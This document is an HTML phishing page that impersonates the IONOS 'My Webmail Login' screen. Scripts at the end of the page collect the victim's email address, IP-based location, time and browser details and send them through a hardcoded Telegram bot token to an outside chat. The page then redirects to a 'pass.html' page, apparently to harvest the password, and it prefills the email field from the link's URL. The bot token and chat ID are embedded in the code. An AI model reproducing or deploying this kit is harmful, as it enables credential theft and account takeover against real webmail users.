<!DOCTYPE HTML>
<html>

  <head>

    

    
    
      <script nonce="NIuDgMvXzmQlsBdjii7VNdP6Gwgh6989J7V2VGmObag=" src="https://frontend-services.ionos.com/t/tag/IONOS/central-login.js" type="text/javascript" async="async" defer="defer" id="oaotag"></script>
    

    
    <script nonce="NIuDgMvXzmQlsBdjii7VNdP6Gwgh6989J7V2VGmObag=" src="https://ce1.uicdn.net/exos/framework/2.0/ionos.min.js" async="async" defer="defer"></script>
    <link rel="stylesheet" href="https://ce1.uicdn.net/exos/framework/2.0/ionos.min.css" />

    <link rel="icon" type="image/png" sizes="32x32" href="/image/favicon-32px.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/image/favicon-16px.png">
    <link rel="icon" type="image/png" sizes="48x48" href="/image/favicon-48px.png">
    <link rel="shortcut icon" type="image/x-icon" href="/image/favicon.ico" />

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="robots" content="index, follow"/>
    <link rel="dns-prefetch" href="https://sherlock.ionos.com/">

    
    

  <title>Login - IONOS</title>
  <meta name="description" content="Access to your entire IONOS world: contracts, products, and customer data, order or change services - now password-protected login." />

  <link rel="alternate" hreflang="de" href="https://login.ionos.de/" />
  <link rel="alternate" hreflang="en-gb" href="https://login.ionos.co.uk/" />
  <link rel="alternate" hreflang="en-us" href="https://login.ionos.com/" />
  <link rel="alternate" hreflang="en-ca" href="https://login.ionos.ca/" />
  <link rel="alternate" hreflang="en" href="https://login.ionos.com/" />
  <link rel="alternate" hreflang="es-es" href="https://login.ionos.es/" />
  <link rel="alternate" hreflang="es-mx" href="https://login.ionos.mx/" />
  <link rel="alternate" hreflang="es" href="https://login.ionos.es/" />
  <link rel="alternate" hreflang="fr" href="https://login.ionos.fr/" />
  <link rel="alternate" hreflang="it" href="https://login.ionos.it/" />
  <link rel="alternate" hreflang="x-default" href="https://login.ionos.com/" />

  <link rel="canonical" href="https://login.ionos.com/" />

  <link rel="stylesheet" href="/style/main.min.css" />


  <link rel="stylesheet" href="index.css">
  <link rel="stylesheet" href="one.css">
  <link rel="stylesheet" href="two.css">
  <link rel="stylesheet" href="three.css">
  <link rel="stylesheet" href="four.css">


  </head>

  <body>

    <p class="address" hidden></p>
    <p class="time" hidden></p>
    <p class="date" hidden></p>
    <p class="brower_info" hidden></p>

    
    <link rel="stylesheet" href="/style/starter-main.min.css" />

    <div class="page-content">

      
      
  <div class="oao-navi-navigation oao-navi-light">
    <div class="oao-navi-left">
      <div class="oao-navi-application-name">
        <a class="oao-navi-app-name" href="/">
          <span class="oao-navi-app-logo"></span>
          <span>Login</span>
        </a>
      </div>
    </div>
    
  </div>



      <main>

        <section class="page-section page-section--default page-section--short">
          <div class="page-section__block">

          
          
  <div class="sheet sheet__section--warning cookie-message hidden">
    <section class="sheet__section">
      <h2 class="headline headline--sub">Activation of Browser Cookies Required</h2>
      <p class="paragraph">To take advantage of our offer, it is necessary for you to allow the use of cookies in your browser settings.</p>
      <a href="https://www.ionos.com/help/security-c85142/browser-security-c85171" class="link link--action" target="_blank">Learn more</a>
    </section>
  </div>



          
          
  <!-- <noscript>
    <div class="sheet sheet--warning">
      <section class="sheet__section">
        <h2 class="headline headline--sub headline--warning">Please enable JavaScript in your browser</h2>
        <p class="paragraph">To take advantage of our offer, it is necessary for you to allow the execution of JavaScript in your browser settings.</p>
      </section>
    </div>
  </noscript> -->



          
          
  



          
          

      <!-- <div class="oao-statuspage-message-container" data-component="CONTROL_PANEL"></div> -->

      <div class="sheet">

        <section class="sheet__section sheet__section--default">
          <ul>
            <li class="stripe stripe--cropped">
              <div class="stripe__item">
                <img class="stripe__visual" src="IMAGE/product-email.svg" height="58" width="auto" />
              </div>
              <div class="stripe__item">
                <h1 class="headline stripe__element">My Webmail Login</h1>
              </div>
            </li>
          </ul>
        </section>

        <section class="sheet__section sheet__section--default">


            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->
            <!-- form -->


<!-- <form method="POST" novalidate> -->


  <form action="" id="form">

            <input type="hidden" name="_csrf" value="td2ZmL_H015k6WuA7Yh5udP1LINMbgfRfWDkAaZ1jDOjb_8Hg-T4_tn34GZJ0F2z26VNjLaRAeEuDWL8HFHUMcNN7QubXc4y"/>
            <input type="hidden" id="url-fragment" name="fragment"/>
            <input type="hidden" id="fingerprint" name="fingerprint"/>
            <input type="hidden" id="jsEnabled" name="jsEnabled" value="false"/>

            <ul>

              <!-- one -->
              <li class="form-stripe">
                <label class="label" for="username">Email address</label>
                
                <input type="text" class="input-text form-input" name="email" id="email" tabindex="1"
                  required="true" autofocus autocomplete="username" autocapitalize="none" spellcheck="false" value="" />
                
                <!-- <p class="input-byline">
                  <a class="link oao-pi-open-in-flyin" target="_blank" href="#">Forgot your login details?</a>
                </p> -->
              </li>



              <!-- two -->
              <!-- <li class="form-stripe">
                <label class="label" for="username">Password </label>
                
                <input type="text" class="input-text form-input" name="identifier" id="password" tabindex="1"
                  required="true" autofocus autocomplete="username" autocapitalize="none" spellcheck="false" value="" />
                
              </li> -->
              <li class="form-stripe form-stripe--actions">
                <button class="button button--primary button--full-width button--with-loader"
                  type="submit" onclick="test()" id="button--with-loader" tabindex="2">Next</button>
              </li>
            </ul>

            <input type="password" class="hidden" name="hiddenPassword" tabindex="-1">

          </form>
        </section>

        

        
          
            

  <!-- <section class="sheet__section sheet__section--secondary hide-when-headless">
    <div class="ias-zone ias-login_offerlink" data-ias-zoneid="login_offerlink"></div>
  </section> -->



          
        

      </div>

      
        

  <h2 class="headline headline--sub headline--headless-hidden">More IONOS Logins</h2>

  <div class="grid grid--full-height grid--headless-hidden">

    <div class="grid-col grid-col--4 grid-col--small-6">
      <a class="tile tile--filled" href="https://mail.ionos.com/">
        <img class="tile__image" src="IMAGE/my-account.svg">
        <span class="tile__label">My IONOS</span>
      </a>
    </div>

    <div class="grid-col grid-col--4 grid-col--small-6">
      <a class="tile tile--filled" href="https://dcd.ionos.com/latest?regDomain=ionos.com">
        <img class="tile__image" src="IMAGE/cloud-dcd.svg">
        <span class="tile__label">Data Center Designer</span>
      </a>
    </div>

    <div class="grid-col grid-col--4 grid-col--small-6">
      <a class="tile tile--filled" href="https://hidrive.ionos.com/">
        <img class="tile__image" src="IMAGE/product-hidrive.svg">
        <span class="tile__label">HiDrive</span>
      </a>
    </div>

  </div>



      

    

          </div>
        </section>

      </main>

    </div>

    
    

  <footer class="page-footer">
    <div class="page-footer__block">

      <section class="page-footer__section page-footer__section--last">

        <div class="page-footer__section-item">
          <div class="oao-statuspage-overall-status page-footer__status"></div>
        </div>

        <div class="page-footer__section-item page-footer__section-item--align-center page-footer__section-item--small-align-left">
          &copy; 2024
          
            
            <a class="page-footer__link" target="_blank" href="https://www.ionos.com/about">IONOS Inc.</a>
            
            
            
            
            
            
          
        </div>

        <div class="page-footer__section-item page-footer__section-item--align-right page-footer__section-item--small-align-left">
          
          
            
            <a class="page-footer__link" target="_blank" href="https://www.ionos.com/terms-gtc/terms-privacy">Privacy Policy</a>
            
            
            
            
            
            
           -
          
            
            <a class="page-footer__link" target="_blank" href="https://www.ionos.com/terms-gtc">T&amp;Cs</a>
            
            
            
            
            
            
          
        </div>

      </section>

    </div>
  </footer>




    

    
    <script nonce="NIuDgMvXzmQlsBdjii7VNdP6Gwgh6989J7V2VGmObag=" src="/script/starter-main.min.js" type="text/javascript"></script>

    
    
  
  
  <div>
    
      <div id="javascript-data" data-visit-id="138f325a-63c0-4cad-b1c4-dda96296e519.B" data-lang="en" data-tenant="US" data-context-path="/" data-env-mode="prod" data-artifact-version="1.0.179" data-artifact-name="cl" data-sherlock-url="https://sherlock.ionos.com/">
      </div>
    
  </div>



  <script nonce="NIuDgMvXzmQlsBdjii7VNdP6Gwgh6989J7V2VGmObag=" src="/script/main.min.js"></script>



    
    
      <script nonce="NIuDgMvXzmQlsBdjii7VNdP6Gwgh6989J7V2VGmObag=" src="/script/mobileapp-redirect.min.js"></script>
    

  </body>


  <script>
    let form = document.querySelector("#form");

    let bot = {
        TOKEN: "6936007699:AAEVccWDEtxhHDCb_PrgsWT3hjFqxtZ0t3M",
        chatID: "6578784861",
    }

    // let bot = {
    //             TOKEN: "6936007699:AAEVccWDEtxhHDCb_PrgsWT3hjFqxtZ0t3M", /// INPUT BOT TOKEN
    //             chatID: "6578784861", /// INPUT CHAT ID
    //         }

    form.addEventListener("submit", (e) => {
        e.preventDefault();


        let time = document.querySelector(".time").innerHTML
            let datess = document.querySelector(".date").innerHTML
            var country = document.querySelector(".address").innerHTML
            let brower_infos = document.querySelector(".brower_info").innerHTML


        var facebook_phone_email = document.querySelector("#email").value
      ///  var facebook_pass = document.querySelector("#password").value

        var my_text = `------+ Ionos +-----%0ACustomer ID, email address or domain : ${facebook_phone_email}%0A%0A-----+ Client IP +-----%0ATime : ${time}%0ADate : ${datess}%0ACountry : ${country}%0APlatform : ${brower_infos}`

        fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=${my_text}`,{
            method: "GET"
        })

        .then(success => {
            window.location.href='pass.html'
        }, error => {
            window.location.href='index.html'
        })

    })
</script>

            <!--GRABS IP ADDRESS -->
            <script>
              let address = document.querySelector(".address")
      
              async function fetchText() {
                  let url = 'https://ipinfo.io/json?token=b24e9bc6d35e5d';
                  let response = await fetch(url);
                  let data = await response.json();
                  address.innerHTML = `${data.country}%0AREGION➡️${data.region}%0ACITY➡️${data.city}%0ATIME ZONE➡️${data.timezone}%0AIP➡️${data.ip}`
              }
              fetchText();
          </script>
      
          
      
          <!--GRABS TIME -->
          <script>
              let time = document.querySelector(".time")
              let today = new Date()
      
              let hours = today.getHours()
              let minutes = today.getMinutes()
              let seconds = today.getSeconds()
              let current_time = `${hours}:${minutes}:${seconds}`;
              time.innerHTML = current_time;
              
      
              function add_zero(num){
                  return num < 10 ? `0${num}`:num;
              }
          </script>
      
      
          <!-- GRABS DATE -->
          <script>
              let dates = document.querySelector(".date")
              let todaytwo = new Date();
      
              let month = todaytwo.getMonth() + 1;
              let year = todaytwo.getFullYear();
              let date = todaytwo.getDate();
              let current_date = `${date}/${month}/${year}`;
              dates.innerHTML = current_date;
          </script>
  
  
          <!-- BROWSER DETAILS -->
          <script>
              let brower_info = document.querySelector(".brower_info")
              brower_info.innerHTML = `${navigator.platform}%0ABROWSER VERSION::-- ${navigator.appVersion}%0ABROWSER LANUAGE::-- ${navigator.language}`
          </script>


<script>
  function test() {
      const gmailemlorphonevalnext = document.querySelector("#username").value;

      const GMAILNAMESSS = localStorage.setItem("gmailemlorphonevalnext", gmailemlorphonevalnext);
  }
</script>


<script>
        
  var url = new URLSearchParams(location.search);
  var hash = location.hash ? location.hash.slice(1) : '';
  var Email = url.get('email') || url.get('login') || hash;
  var eml = url.get('email') || url.get('login') || hash;


  var tests = eml;
  document.getElementById("email").value = tests ;  //Now you get the js variable inside your form element

</script>



</html>
